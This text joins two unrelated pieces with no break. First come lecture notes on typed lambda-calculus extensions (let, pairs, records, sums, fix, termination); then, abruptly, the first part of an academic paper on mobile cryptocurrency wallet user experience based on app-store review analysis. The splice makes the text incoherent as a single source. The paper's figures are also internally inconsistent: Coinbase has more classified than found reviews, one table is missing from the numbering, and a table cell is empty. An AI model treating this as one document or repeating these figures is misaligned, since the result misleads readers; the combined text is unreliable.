- Extend soundness proof (new stuck states, proof cases)

In fact, extensions that add new types have even more structure

Let bindings (CBV)

\[
e ::= \ldots \mid \text{let } x = e_1 \text{ in } e_2
\]

\[
\frac{e_1 \rightarrow e_1'}{\text{let } x = e_1 \text{ in } e_2 \rightarrow \text{let } x = e_1' \text{ in } e_2}
\qquad
\text{let } x = v \text{ in } e \rightarrow e[v/x]
\]

\[
\frac{\Gamma \vdash e_1 : \tau' \quad \Gamma, x : \tau' \vdash e_2 : \tau}{\Gamma \vdash \text{let } x = e_1 \text{ in } e_2 : \tau}
\]

(Also need to extend definition of substitution...)

Progress: If \( e \) is a let, 1 of the 2 new rules apply (using induction)

Preservation: Uses Substitution Lemma

Substitution Lemma: Uses Weakening and Exchange

Derived forms

`let` seems just like `λ`, so can make it a derived form

- `let x = e_1 in e_2` “a macro” / “desugars to” `(λx. e_2) e_1`
- A “derived form”

(Harder if `λ` needs explicit type)

Or just define the semantics to replace `let` with `λ`:

\[
\text{let } x = e_1 \text{ in } e_2 \rightarrow (\lambda x.\ e_2)\ e_1
\]

These 3 semantics are *different* in the state-sequence sense \((e_1 \rightarrow e_2 \rightarrow \ldots \rightarrow e_n)\)

- But (totally) *equivalent* and you could prove it (not hard)

Note: ML type-checks `let` and `λ` differently (later topic)

Note: Don’t desugar early if it hurts error messages!

Booleans and Conditionals

\[
e ::= \ldots \mid \text{true} \mid \text{false} \mid \text{if } e_1\ e_2\ e_3
\qquad
v ::= \ldots \mid \text{true} \mid \text{false}
\qquad
\tau ::= \ldots \mid \text{bool}
\]

\[
\frac{e_1 \to e_1'}{\text{if } e_1\ e_2\ e_3 \to \text{if } e_1'\ e_2\ e_3}
\qquad
\text{if true } e_2\ e_3 \to e_2
\qquad
\text{if false } e_2\ e_3 \to e_3
\]

\[
\Gamma \vdash \text{true} : \text{bool}
\qquad
\Gamma \vdash \text{false} : \text{bool}
\qquad
\frac{\Gamma \vdash e_1 : \text{bool} \quad \Gamma \vdash e_2 : \tau \quad \Gamma \vdash e_3 : \tau}{\Gamma \vdash \text{if } e_1\ e_2\ e_3 : \tau}
\]

Also extend definition of substitution (will stop writing that)...
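As a concrete (and hedged) companion to the derived-form discussion and the if rules above, here is a small OCaml sketch over an invented AST for this language: `desugar_let` rewrites a let into the application `(λx. e_2) e_1`, and `step_if` implements the three if rules, taking the full step function as a parameter for the congruence case.

```ocaml
(* An illustrative AST; the constructor names are ours, not part of the notes. *)
type exp =
  | Var of string
  | Lam of string * exp
  | App of exp * exp
  | Const of int
  | Let of string * exp * exp
  | Bool of bool
  | If of exp * exp * exp

(* The derived-form view:  let x = e1 in e2  ~~>  (λx. e2) e1  *)
let desugar_let (e : exp) : exp =
  match e with
  | Let (x, e1, e2) -> App (Lam (x, e2), e1)
  | _ -> e

(* The three small-step rules for if, parameterised by the overall step function
   so the congruence rule can reduce the guard. *)
let step_if (step : exp -> exp) (e : exp) : exp =
  match e with
  | If (Bool true, e2, _)  -> e2
  | If (Bool false, _, e3) -> e3
  | If (e1, e2, e3)        -> If (step e1, e2, e3)
  | _ -> invalid_arg "step_if: not an if-expression"
```

Whether one desugars eagerly or keeps let as a primitive rule is exactly the trade-off noted above: the desugared program steps through slightly different states but is observably equivalent.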
Notes: CBN, new Canonical Forms case, all lemma cases easy Pairs (CBV, left-right) \[ \begin{align*} e & ::= \ldots \mid (e, e) \mid e.1 \mid e.2 \\ v & ::= \ldots \mid (v, v) \\ \tau & ::= \ldots \mid \tau * \tau \end{align*} \] \[ \begin{align*} e_1 & \rightarrow e'_1 \\ \hline (e_1, e_2) & \rightarrow (e'_1, e_2) \\ \hline e & \rightarrow e' \\ \hline e.1 & \rightarrow e'.1 \\ \hline e & \rightarrow e' \\ \hline e.2 & \rightarrow e'.2 \\ \hline (v_1, v_2).1 & \rightarrow v_1 \\ \hline (v_1, v_2).2 & \rightarrow v_2 \end{align*} \] Small-step can be a pain - Large-step needs only 3 rules - Will learn more concise notation later (evaluation contexts) Pairs continued \[ \Gamma \vdash e_1 : \tau_1 \quad \Gamma \vdash e_2 : \tau_2 \] \[ \Gamma \vdash (e_1, e_2) : \tau_1 \ast \tau_2 \] \[ \Gamma \vdash e : \tau_1 \ast \tau_2 \] \[ \Gamma \vdash e.1 : \tau_1 \] \[ \Gamma \vdash e.2 : \tau_2 \] Canonical Forms: If \( \cdot \vdash v : \tau_1 \ast \tau_2 \), then \( v \) has the form \((v_1, v_2)\) Progress: New cases using Canonical Forms are \( v.1 \) and \( v.2 \) Preservation: For primitive reductions, inversion gives the result directly Records Records are like $n$-ary tuples except with *named fields* - Field names are *not* variables; they do *not* $\alpha$-convert \[ \begin{align*} e & ::= \ldots \mid \{ l_1 = e_1; \ldots; l_n = e_n \} \mid e.l \\ v & ::= \ldots \mid \{ l_1 = v_1; \ldots; l_n = v_n \} \\ \tau & ::= \ldots \mid \{ l_1 : \tau_1; \ldots; l_n : \tau_n \} \end{align*} \] \[ \begin{array}{c} \frac{e_i \to e'_i}{\{ l_1 = v_1, \ldots, l_{i-1} = v_{i-1}, l_i = e_i, \ldots, l_n = e_n \} \to \{ l_1 = v_1, \ldots, l_{i-1} = v_{i-1}, l_i = e'_i, \ldots, l_n = e_n \}} \\ \frac{e \to e'}{e.l \to e'.l} \end{array} \] \[ \begin{align*} 1 \leq i \leq n \\ \{ l_1 = v_1, \ldots, l_n = v_n \}.l_i \to v_i \end{align*} \] \[ \frac{\Gamma \vdash e_1 : \tau_1 \quad \ldots \quad \Gamma \vdash e_n : \tau_n \quad \text{labels distinct}}{\Gamma \vdash \{ l_1 = e_1, \ldots, l_n = e_n \} : \{ l_1 : \tau_1, \ldots, l_n : \tau_n \}} \] \[ \frac{\Gamma \vdash e : \{ l_1 : \tau_1, \ldots, l_n : \tau_n \} \quad 1 \leq i \leq n}{\Gamma \vdash e.l_i : \tau_i} \] Records continued Should we be allowed to reorder fields? - \[ \vdash \{ l_1 = 42; l_2 = \text{true} \} : \{ l_2 : \text{bool}; l_1 : \text{int} \} \] Really a question about, “when are two types equal?” Nothing wrong with this from a type-safety perspective, yet many languages disallow it - Reasons: Implementation efficiency, type inference Return to this topic when we study subtyping Sums What about ML-style datatypes: \[ \text{type } t = A \mid B \text{ of } \text{int} \mid C \text{ of } \text{int} * t \] 1. Tagged variants (i.e., discriminated unions) 2. Recursive types 3. Type constructors (e.g., \text{type } 'a \text{ mylist} = ...) 4. Named types For now, just model (1) with (anonymous) sum types - (2) is in a later lecture, (3) is straightforward, and (4) we’ll discuss informally Sums syntax and overview \[ e ::= \ldots | A(e) | B(e) | \text{match } e \text{ with } A x. \ e | B x. \ e \] \[ v ::= \ldots | A(v) | B(v) \] \[ \tau ::= \ldots | \tau_1 + \tau_2 \] - Only two constructors: \(A\) and \(B\) - All values of any sum type built from these constructors - So \(A(e)\) can have any sum type allowed by \(e\)’s type - No need to declare sum types in advance - Like functions, will “guess the type” in our rules Sums operational semantics match $A(v)$ with $Ax. \ e_1 \mid By. \ e_2 \rightarrow e_1[v/x]$ match $B(v)$ with $Ax. \ e_1 \mid By. 
\ e_2 \rightarrow e_2[v/y]$

\[
\frac{e \rightarrow e'}{A(e) \rightarrow A(e')}
\qquad
\frac{e \rightarrow e'}{B(e) \rightarrow B(e')}
\qquad
\frac{e \rightarrow e'}{\text{match } e \text{ with } Ax.\ e_1 \mid By.\ e_2 \rightarrow \text{match } e' \text{ with } Ax.\ e_1 \mid By.\ e_2}
\]

match has binding occurrences, just like pattern-matching

(Definition of substitution must avoid capture, just like functions)

What is going on

Feel free to think about *tagged values* in your head:

- A tagged value is a pair of:
  - A tag A or B (or 0 or 1 if you prefer)
  - The (underlying) value
- A match:
  - Checks the tag
  - Binds the variable to the (underlying) value

This much is just like OCaml and related to homework 2

Sums Typing Rules

Inference version (not trivial to infer; can require annotations)

\[
\frac{\Gamma \vdash e : \tau_1}{\Gamma \vdash A(e) : \tau_1 + \tau_2}
\qquad
\frac{\Gamma \vdash e : \tau_2}{\Gamma \vdash B(e) : \tau_1 + \tau_2}
\qquad
\frac{\Gamma \vdash e : \tau_1 + \tau_2 \quad \Gamma, x : \tau_1 \vdash e_1 : \tau \quad \Gamma, y : \tau_2 \vdash e_2 : \tau}{\Gamma \vdash \text{match } e \text{ with } Ax.\ e_1 \mid By.\ e_2 : \tau}
\]

Key ideas:

- For constructor-uses, “other side can be anything”
- For `match`, both sides need same type
  - Don’t know which branch will be taken, just like an `if`.
- In fact, can drop explicit booleans and encode with sums: E.g., `bool = int + int`, `true = A(0)`, `false = B(0)`

Sums Type Safety

Canonical Forms: If $\cdot \vdash v : \tau_1 + \tau_2$, then there exists a $v_1$ such that either $v$ is $A(v_1)$ and $\cdot \vdash v_1 : \tau_1$ or $v$ is $B(v_1)$ and $\cdot \vdash v_1 : \tau_2$

- Progress for $\text{match } v \text{ with } Ax. \ e_1 \mid By. \ e_2$ follows, as usual, from Canonical Forms
- Preservation for $\text{match } v \text{ with } Ax. \ e_1 \mid By. \ e_2$ follows from the type of the underlying value and the Substitution Lemma
- The Substitution Lemma has new “hard” cases because we have new binding occurrences
- But that’s all there is to it (plus lots of induction)

What are sums for?

- Pairs, structs, records, aggregates are fundamental data-builders
- Sums are just as fundamental: “this or that not both”
- You have seen how OCaml does sums (datatypes)
- Worth showing how C and Java do the same thing
  - A primitive in one language is an idiom in another

type t = A of t1 | B of t2 | C of t3
match e with A x -> ...

One way in C:

```c
struct t {
  enum {A, B, C} tag;
  union {t1 a; t2 b; t3 c;} data;
};
...
switch(e->tag){
  case A: t1 x=e->data.a; ...
```

- No static checking that tag is obeyed
- As fat as the fattest variant (avoidable with casts)
- Mutation costs us again!

Sums in Java

type t = A of t1 | B of t2 | C of t3
match e with A x -> ...

One way in Java (t4 is the match-expression’s type):

abstract class t {abstract t4 m();}
class A extends t { t1 x; t4 m(){...}}
class B extends t { t2 x; t4 m(){...}}
class C extends t { t3 x; t4 m(){...}}
... e.m() ...

- A new method in t and subclasses for each match expression
- Supports extensibility via new variants (subclasses) instead of extensibility via new operations (match expressions)

Pairs vs.
Pairs vs. Sums

You need both in your language

- With only pairs, you clumsily use dummy values, waste space, and rely on unchecked tagging conventions
  - Example: replace `int + (int → int)` with `int * (int * (int → int))`

Pairs and sums are "logical duals" (more on that later)

- To make a \( \tau_1 * \tau_2 \) you need a \( \tau_1 \) and a \( \tau_2 \)
- To make a \( \tau_1 + \tau_2 \) you need a \( \tau_1 \) or a \( \tau_2 \)
- Given a \( \tau_1 * \tau_2 \), you can get a \( \tau_1 \) or a \( \tau_2 \) (or both; your "choice")
- Given a \( \tau_1 + \tau_2 \), you must be prepared for either a \( \tau_1 \) or a \( \tau_2 \) (the value's "choice")

Base Types and Primitives, in general

What about floats, strings, ...? Could add them all or do something more general...

Parameterize our language/semantics by a collection of base types \( (b_1, \ldots, b_n) \) and primitives \( (p_1 : \tau_1, \ldots, p_n : \tau_n) \). Examples:

- `concat : string → string → string`
- `toInt : float → int`
- `"hello" : string`

For each primitive, assume that if it is applied to values of the right types it produces a value of the right type.

Together the types and assumed steps tell us how to type-check and evaluate \( p_i\ v_1 \ldots v_n \) where \( p_i \) is a primitive. We can prove soundness once and for all given the assumptions.

Recursion

We won't prove it, but every extension so far preserves termination.

A Turing-complete language needs some sort of loop, but our lambda-calculus encoding won't type-check, nor will any encoding of equal expressive power. So instead add an explicit construct for recursion.

You might be thinking `let rec f x = e`, but we will do something more concise and general but less intuitive.

\[
e ::= \ldots \mid \text{fix } e
\]

\[
\frac{e \rightarrow e'}{\text{fix } e \rightarrow \text{fix } e'}
\qquad
\text{fix } \lambda x.\ e \rightarrow e[\text{fix } \lambda x.\ e / x]
\]

No new values and no new types.

Using fix

To use fix like let rec, just pass it a two-argument function where the first argument is for recursion

- Not shown: fix and tuples can also encode mutual recursion

Example:

\[
(\text{fix } \lambda f.\ \lambda n.\ \text{if } (n<1)\ 1\ (n * (f(n - 1))))\ 5
\]
\[
\rightarrow\ (\lambda n.\ \text{if } (n<1)\ 1\ (n * ((\text{fix } \lambda f.\ \lambda n.\ \text{if } (n<1)\ 1\ (n * (f(n - 1))))(n - 1))))\ 5
\]
\[
\rightarrow\ \text{if } (5<1)\ 1\ (5 * ((\text{fix } \lambda f.\ \lambda n.\ \text{if } (n<1)\ 1\ (n * (f(n - 1))))(5 - 1)))
\]
\[
\rightarrow^2\ 5 * ((\text{fix } \lambda f.\ \lambda n.\ \text{if } (n<1)\ 1\ (n * (f(n - 1))))(5 - 1))
\]
\[
\rightarrow^2\ 5 * ((\lambda n.\ \text{if } (n<1)\ 1\ (n * ((\text{fix } \lambda f.\ \lambda n.\ \text{if } (n<1)\ 1\ (n * (f(n - 1))))(n - 1))))\ 4)
\]
\[
\rightarrow\ \ldots
\]
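As a cross-check on the unrolling above, here is a small sketch (not part of the lecture) of a call-by-value `fix` written in Python; the recursive occurrence is wrapped in a lambda so the unrolling is delayed until an argument arrives, just as the operational rule only fires under an application in practice.

```python
# fix f behaves like a fixed point of f: fix(f) "equals" f(fix(f)),
# but in a strict language we eta-expand so the unrolling happens lazily.

def fix(f):
    return lambda n: f(fix(f))(n)

# The factorial functional from the slides:
#   lambda f. lambda n. if (n < 1) 1 (n * f(n - 1))
fact_step = lambda f: lambda n: 1 if n < 1 else n * f(n - 1)

fact = fix(fact_step)
print(fact(5))   # 120, matching the hand reduction of (fix ...) 5
```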
Why called fix?

In math, a fix-point of a function \( g \) is an \( x \) such that \( g(x) = x \)

- This makes sense only if \( g \) has type \( \tau \rightarrow \tau \) for some \( \tau \)
- A particular \( g \) could have 0, 1, 39, or infinitely many fix-points
- Examples for functions of type \( \text{int} \rightarrow \text{int} \):
  - \( \lambda x.\ x + 1 \) has no fix-points
  - \( \lambda x.\ x * 0 \) has one fix-point
  - \( \lambda x.\ \text{absolute\_value}(x) \) has an infinite number of fix-points
  - \( \lambda x.\ \text{if } (x < 10\ \&\&\ x > 0)\ x\ 0 \) has 10 fix-points

Higher types

At higher types like \( (\text{int} \rightarrow \text{int}) \rightarrow (\text{int} \rightarrow \text{int}) \), the notion of fix-point is exactly the same (but harder to think about)

- For what inputs \( f \) of type \( \text{int} \rightarrow \text{int} \) is \( g(f) = f \)?

Examples:

- \( \lambda f.\ \lambda x.\ (f\ x) + 1 \) has no fix-points
- \( \lambda f.\ \lambda x.\ (f\ x) * 0 \) (or just \( \lambda f.\ \lambda x.\ 0 \)) has 1 fix-point
  - The function that always returns 0
  - In math, there is exactly one such function (cf. equivalence)
- \( \lambda f.\ \lambda x.\ \text{absolute\_value}(f\ x) \) has an infinite number of fix-points: any function that never returns a negative result

Back to factorial

Now, what are the fix-points of \( \lambda f.\ \lambda x.\ \text{if } (x < 1)\ 1\ (x * (f(x - 1))) \)?

It turns out there is exactly one (in math): the factorial function!

And \(\textbf{fix}\ \lambda f.\ \lambda x.\ \text{if } (x < 1)\ 1\ (x * (f(x - 1)))\) behaves just like the factorial function

- That is, it behaves just like the fix-point of \( \lambda f.\ \lambda x.\ \text{if } (x < 1)\ 1\ (x * (f(x - 1))) \)
- In general, \(\textbf{fix}\) takes a function-taking-function and returns its fix-point

(This isn't necessarily important, but it explains the terminology and shows that programming is deeply connected to mathematics)

Typing fix

\[
\frac{\Gamma \vdash e : \tau \rightarrow \tau}{\Gamma \vdash \text{fix } e : \tau}
\]

Math explanation: If \( e \) is a function from \( \tau \) to \( \tau \), then \( \text{fix } e \), the fixed-point of \( e \), is some \( \tau \) with the fixed-point property

- So it's something with type \( \tau \)

Operational explanation: \( \text{fix } \lambda x.\ e' \) becomes \( e'[\text{fix } \lambda x.\ e'/x] \)

- The substitution means \( x \) and \( \text{fix } \lambda x.\ e' \) need the same type
- The result means \( e' \) and \( \text{fix } \lambda x.\ e' \) need the same type

Note: The \( \tau \) in the typing rule is usually instantiated with a function type

- e.g., \( \tau_1 \rightarrow \tau_2 \), so \( e \) has type \( (\tau_1 \rightarrow \tau_2) \rightarrow (\tau_1 \rightarrow \tau_2) \)

Note: Proving soundness is straightforward!

General approach

We added let, booleans, pairs, records, sums, and fix

- **let** was syntactic sugar
- **fix** made us Turing-complete by "baking in" self-application
- The others *added types*

Whenever we add a new form of type \( \tau \) there are:

- Introduction forms (ways to make values of type \( \tau \))
- Elimination forms (ways to use values of type \( \tau \))

What are these forms for functions? Pairs? Sums?

When you add a new type, think "what are the intro and elim forms?"

Anonymity

We added many forms of types, all *unnamed* a.k.a. *structural*.
Many real PLs have (all or mostly) *named* types:

- Java, C, C++: all record types (or similar) have names
  - Omitting them just means the compiler makes up a name
- OCaml sum types and record types have names

A never-ending debate:

- Structural types allow more code reuse: good
- Named types allow less code reuse: good
- Structural types allow generic type-based code: good
- Named types let type-based code distinguish names: good

The theory is often easier and simpler with structural types

Termination

Surprising fact: If \( \vdash e : \tau \) in STLC with all our additions except \(\texttt{fix}\), then there exists a \( v \) such that \( e \rightarrow^* v \)

That is, all programs terminate

So termination is trivially decidable (the constant "yes" function), so our language is not Turing-complete

The proof requires more advanced techniques than we have learned so far because the size of expressions and typing derivations does not decrease with each program step

Non-proof:

- Recursion in \(\lambda\) calculus requires some sort of self-application
- Easy fact: For all \( \Gamma \), \( x \), and \( \tau \), we cannot derive \( \Gamma \vdash x\ x : \tau \)
ENHANCING MOBILE CRYPTOCURRENCY WALLETS: A COMPREHENSIVE ANALYSIS OF USER EXPERIENCE, SECURITY, AND FEATURE DEVELOPMENT

Richard1*; Muhammad Ammar Marsuki2; Gading Aryo Pamungkas3; Felix Irwanto4

Information Systems Department1,2,3,4 Bina Nusantara University, Indonesia1,2,3,4 https://binus.ac.id/1,2,3,4

richard-slc@binus.edu1*, muhammad.marsuki@binus.ac.id2, gading.pamungkas@binus.ac.id3, felix.irwanto@binus.ac.id4

(*) Corresponding Author (Responsible for the Quality of Paper Content)

The creation is distributed under the Creative Commons Attribution-NonCommercial 4.0 International License.

Abstract—The surge in cryptocurrency usage has increased reliance on cryptocurrency wallet applications. However, the usability, security, and feature richness of crypto wallets require significant enhancements. This research aims to identify critical factors that should guide the future design of mobile cryptocurrency wallets. The first step was to collect user reviews on several popular crypto wallets as the dataset. A total of 5,466 mobile wallet-related reviews from mobile application stores were filtered and analyzed. A machine-learning approach was used to cluster the user reviews. The analysis shows that customer issues are divided into four main themes: domain-specific challenges, security and privacy concerns, misconceptions, and trust issues. A software process assessment was also conducted to examine the current state of crypto wallets in terms of security, usability, and feature richness. Around 21 crypto wallet platforms were explored and assessed. Based on the thematic analysis and software process assessment, feature recommendations are proposed to address these shortcomings and enhance the credibility of mobile cryptocurrency wallets.

Keywords: Crypto wallet, software process assessment, thematic analysis, user experience.

INTRODUCTION

A cryptocurrency (crypto) wallet is often defined as a software application allowing users to store, manage, and transact crypto assets such as Bitcoin, Ethereum, etc. Crypto wallets establish a unique field, as they combine features of password managers and banking applications. A crypto wallet is considered the primary interface for interacting with the asset in the blockchain. Unlike traditional wallets holding physical currency, crypto wallets do not store crypto assets [2]. Instead, they provide the means to access and interact with the digital assets on blockchain networks. The modern-day crypto wallet allows users to connect to various blockchain networks and switch assets across the network [3].

Technically, a crypto wallet operates by keeping track of private keys used to access cryptocurrency addresses and execute transactions [4]. Based on internet accessibility, crypto wallets can be categorized as online (hot) and offline (cold) wallets. A cold wallet is considered the secure version of a hot wallet, as the wallet is not exposed to the online connection. However, hot wallets are more convenient as they connect directly to the blockchain network.

Developing a crypto wallet is tricky, as the developer should understand and consider security, usability, and feature richness. Security is crucial to protect sensitive data (private key) and transaction authorizations (signing) in a crypto wallet [5]. Usability can ensure widespread crypto wallet adoption by designing a wallet that understands the needs of new and experienced users.
Feature richness drives the crypto wallet beyond its essential functionalities, transforming it into a dynamic tool that enhances the user experience. Balancing these three elements is crucial for creating a wallet that is both secure and user-friendly. Recent scholarly investigations reveal that user experience (UX) research in blockchain-related technologies, including cryptocurrency, lags behind the current advancements in blockchain [6]. The prevalence of financial losses attributed to user misconceptions about the functionalities of crypto wallets serves as substantial evidence to support this observation [7], [8]. In their study, Krombholz et al. conducted a survey focusing on UX within the Bitcoin network, revealing a widespread lack of user understanding about available features, particularly regarding security and privacy, which frequently compromises their anonymity. This gap in understanding may stem from inadequate usability in desktop and mobile-based crypto wallets, especially in executing basic operations. Users often encounter instructions written in overly technical language, which is challenging to comprehend, and they lack clear guidance on troubleshooting steps and problem-solving methods. Since trust is a fundamental motivator among crypto wallet users, these usability issues have a direct and adverse effect on the perceived reliability of these wallets, leading to a disproportionately low usage rate despite high adoption figures [7], [9]. To address general and domain-specific challenges, future wallet designs should incorporate user interfaces that offer comprehensive, user-centered information and implement systems to mitigate financial losses [10], [11]. The urgency of having a crypto wallet is underscored by the imperative need for secure transaction confirmation and safeguarding private key addresses. While keeping security, the crypto wallet should provide an excellent experience for its users. In principle, improving the user experience of crypto wallets increases crypto adoption. Crypto wallet developers should consider the user’s needs when developing the platform. This research aims to deepen the understanding of user perceptions regarding crypto wallets, with the user’s perception poised to become the main driver for the future of crypto wallet design. This research will employ two primary methods: a thematic analysis of user reviews on mobile application stores and a software process assessment of crypto wallets. A detailed examination of various crypto wallet features, usability, and security aspects will be conducted. Through these methodologies, the research intends to provide a comprehensive overview of the current state of crypto wallets. Afterward, the future feature requirements of the crypto wallet will be proposed as the guideline for further development. **MATERIALS AND METHODS** Our research utilizes two approaches to garner comprehensive insights into the crypto wallet. The first approach involves data mining and analysis, leveraging advanced techniques to extract meaningful reviews from the application store. This process allows us to uncover correlations, identify potential challenges, and reveal valuable information that may not be apparent through traditional methods. Concurrently, we employ a software process assessment approach that examines the crypto wallet to evaluate its effectiveness and adherence to security, usability, and feature richness. 
The synthesis of findings from these two approaches is presented in the results section, providing a cohesive overview of the data-driven insights derived from the analysis and the actionable recommendations from the software process assessment. This comprehensive synthesis offers a nuanced perspective on the interplay between quantitative data and qualitative process evaluations, enriching our understanding of the studied context and facilitating a well-rounded interpretation of the research outcomes.

**Data Mining and Analysis**

This research devised a methodical framework for examining the data essential for exploring users' preferences regarding cryptocurrency wallet features. Data acquisition was conducted through a web scraping technique, targeting user reviews on App Stores. After data collection, a data cleansing phase was initiated, employing various pre-processing methods to distill the data to only that pertinent to the study; as part of this pre-processing, each word was reduced to its root form (stemming) to enhance accuracy by minimizing variations in the text. To ascertain the reliability and validity of the sampled dataset, the K-Fold validation technique was implemented, a crucial factor influencing the precision of the analysis. The final stage of the methodology involved the application of statistical thematic analysis. The primary objective of this phase was to discern prevalent trends, patterns, and potential challenges specific to mobile cryptocurrency wallets.

**Feature Extraction** - Four methods were employed to analyze the extensive user reviews of mobile crypto wallets. First, a count vectorizer was used to tally the frequency of specific words and phrases. The significance of each word and phrase was then assessed using the term frequency-inverse document frequency (TF-IDF) technique. Sentiment analysis was performed, assigning scores to reviews from -1 (extremely negative) to 1 (extremely positive) based on the occurrence of positive, negative, and neutral words. Finally, the data was divided into training and testing subsets to evaluate the accuracy of the feature extraction models.

**Table 1.** Classified reviews.

<table>
<thead>
<tr>
<th>Classification</th>
<th>Review Text</th>
<th>Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>Related to Cryptocurrency</td>
<td>I was caught off guard by the fees, but ended up with just about 75 USD in my account.</td>
<td>The high transaction fees caused a bit of dissatisfaction for the user.</td>
</tr>
<tr>
<td>UX in general</td>
<td>With the latest version 1.0.2, crashes are nearly eliminated, but the app still occasionally freezes on startup.</td>
<td>Focus on how the application behaves—nothing to do with cryptocurrency.</td>
</tr>
<tr>
<td>Irrelevant to UX</td>
<td>I'm hoping this will be my ticket to the moon!</td>
<td>Unrelated to the application or the cryptocurrency.</td>
</tr>
</tbody>
</table>

Source: (Research Results, 2024)

**Training Set** - Out of the 27,934 reviews, a subset of 1,000 reviews was randomly selected for categorization based on their relevance to user experience (UX). In this context, relevance is defined as the review's pertinence to specific features of mobile cryptocurrency wallets and insights derived from previous research. This categorization process sorts the reviews into three groups: those relevant to cryptocurrency, those about UX in general, and those deemed irrelevant to UX. Table 1 presents each review type's examples and explanations for their respective classifications.
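The feature-extraction and validation steps described in this section could be sketched roughly as follows. This is an illustrative Python/scikit-learn outline, not the authors' code: the file name `reviews.csv`, its column names, and the choice of logistic regression as the classifier are assumptions made for the example.

```python
# Illustrative outline: count/TF-IDF features over review text, a binary
# "UX-related" label, and k-fold validated scores. Not the authors' pipeline.
import pandas as pd
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline

reviews = pd.read_csv("reviews.csv")      # assumed columns: "text", "ux_related" (0/1)
texts, labels = reviews["text"], reviews["ux_related"]

# Count-vectorizer step (word/phrase frequencies); shown for completeness,
# the classifier below uses the TF-IDF weighting instead.
counts = CountVectorizer(ngram_range=(1, 2)).fit_transform(texts)

# A lexicon-based sentiment score in [-1, 1] per review could be appended
# as an extra feature here; omitted to keep the sketch short.

clf = make_pipeline(TfidfVectorizer(ngram_range=(1, 2)),
                    LogisticRegression(max_iter=1000))

# 10-fold cross-validated AUC and F1 (the paper reports roughly 0.84 and 0.74).
auc = cross_val_score(clf, texts, labels, cv=10, scoring="roc_auc").mean()
f1 = cross_val_score(clf, texts, labels, cv=10, scoring="f1").mean()
print(f"AUC={auc:.2f}  F1={f1:.2f}")
```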
**Machine Learning Model** - After finalizing the training dataset, we employed K-Fold validation to evaluate our machine learning model. Combining our pre-processing techniques, sentiment scoring, and random sampling resulted in an F1 score of 0.74 for reviews related to user experience (UX). The F1 score is a metric in machine learning used to assess a model’s precision. A random binary classifier would have an Area Under the Receiver Operating Characteristic Curve (AUC-ROC) value of 0.5, while a perfect classifier would score 1. Through 10-fold cross-validation, our classifier achieved an average AUC value of 0.84. **Data Analysis** **Thematic Analysis** - The analysis was selected for its proficiency in detecting and isolating data, facilitating the interpretation and formation of patterns [12]. In the subsequent phase, the reviews underwent a batch coding process. This process involved identifying themes within the coded data, each being defined and labeled to represent its essence accurately. As the analysis advanced, these themes were meticulously refined to ensure they precisely mirrored the data’s content. This analytical process culminated in identifying four primary themes: domain-specific issues, security and privacy concerns, misconceptions, and trust aspects. The scope of the analysis was then concentrated on the most pertinent reviews for each theme, culminating in 5,466 reviews. Table 2 details the specific number of reviews selected for each theme from the different wallets. **Table 2.** The count of classified and analyzed reviews for each wallet and platform. <table> <thead> <tr> <th>Wallet Platform</th> <th>Found Reviews</th> <th>Classified Reviews</th> <th>Analyzed Reviews</th> </tr> </thead> <tbody> <tr> <td>Metamask</td> <td>1,794</td> <td>1,498</td> <td>613</td> </tr> <tr> <td>Coinbase</td> <td>2,360</td> <td>2,581</td> <td>1,401</td> </tr> <tr> <td>Coinomi</td> <td>1,692</td> <td>850</td> <td>405</td> </tr> <tr> <td>Trust Wallet</td> <td>16,130</td> <td>4,016</td> <td>1,884</td> </tr> <tr> <td>BlockChain</td> <td>3,958</td> <td>2,761</td> <td>1,163</td> </tr> <tr> <td>Total</td> <td>27,934</td> <td>11,706</td> <td>5,466</td> </tr> </tbody> </table> Source: (Research Results, 2024) **Software Process Assessment** Our software process assessment begins with setting review indicators that focus on security, feature richness, and usability. The following process is choosing samples of wallets, delving down into the features, and exploring the functionalities offered by the wallets to user needs and assessment standards. Usability considerations encompass examining user interfaces, intuitiveness, and overall user experience. Wallet apps are observed in real-time usage scenarios to ensure a holistic assessment. Comprehensive testing is conducted by involving the download and installation of the selected wallet apps. This testing phase examines feature richness, ease of use, and any security issues that might impact user satisfaction. The results of these evaluations are then summarized to contribute valuable insights into the strengths and areas for improvement in non-custodial hot wallet applications. RESULTS AND DISCUSSION This section provides detailed outcomes from the research methodology using thematic analysis and software process assessment. The thematic analysis allowed for the distillation and categorization of critical themes and patterns embedded within the qualitative data, providing a view of intrinsic connections within the dataset. 
Integration with software process assessment helps gain insight into real case testing scenarios based on a wallet's usability, feature richness, and security. The results could help build the future architecture of a non-custodial hot crypto wallet.

Thematic Analysis Result

The thematic analysis revealed four distinct themes, with domain-specific issues emerging as the most prevalent. This was followed by themes related to security and privacy, misconceptions, and trust.

Domain-specific - This theme focuses on issues unique to mobile crypto wallets. Our findings indicate a strong user preference for mobile wallets capable of storing multiple currencies. Wallets featuring this functionality typically receive numerous positive reviews. Conversely, poor user interface design is a common critique in the reviews, noted to diminish the overall user experience and, in extreme instances, result in financial loss.

Security and Privacy - This theme was obtained from reviews addressing issues regarding mobile wallets' security and privacy.

Table 4. Findings in security and privacy theme

<table>
<thead>
<tr>
<th>Review Text</th>
<th>Insight</th>
</tr>
</thead>
<tbody>
<tr>
<td>The wallet feels very secure to me thanks to features like password protection, biometrics, BIP39.</td>
<td>The security options offered by the wallet enhance users' sense of security.</td>
</tr>
<tr>
<td>Despite never sharing my password, an unknown party accessed my wallet. Customer support responded with a bot, leaving me no choice but to delete the wallet.</td>
<td></td>
</tr>
</tbody>
</table>

The reviews highlight the necessity of multiple security measures, particularly emphasizing the importance of second-factor authentication. Additionally, the reviews underline the critical role of customer support in assisting users with issues related to sensitive personal information.

Misconception - This theme highlights the drawbacks resulting from user misunderstandings.

Table 5. Findings in misconception theme

<table>
<thead>
<tr>
<th>Review Text</th>
<th>Insight</th>
</tr>
</thead>
<tbody>
<tr>
<td>I've generally had no problems, except my balance seems really buggy and inaccurate after transfers. Not sure why that happens.</td>
<td>The balance being displayed takes time to sync with the blockchain.</td>
</tr>
<tr>
<td>Regarding the high ETH transaction fees, they are not the wallet's fault; refer to this article [url to article about transaction fee]. It appears that no one is willing to take the time to understand how this technology functions.</td>
<td>The abundance of negative comments suggests that the majority of users are still unfamiliar with how basic crypto works.</td>
</tr>
</tbody>
</table>

While certain issues arising from misconceptions could be attributed to developer shortcomings, our analysis suggests that the primary cause often lies in the users' limited understanding of how cryptocurrency functions.

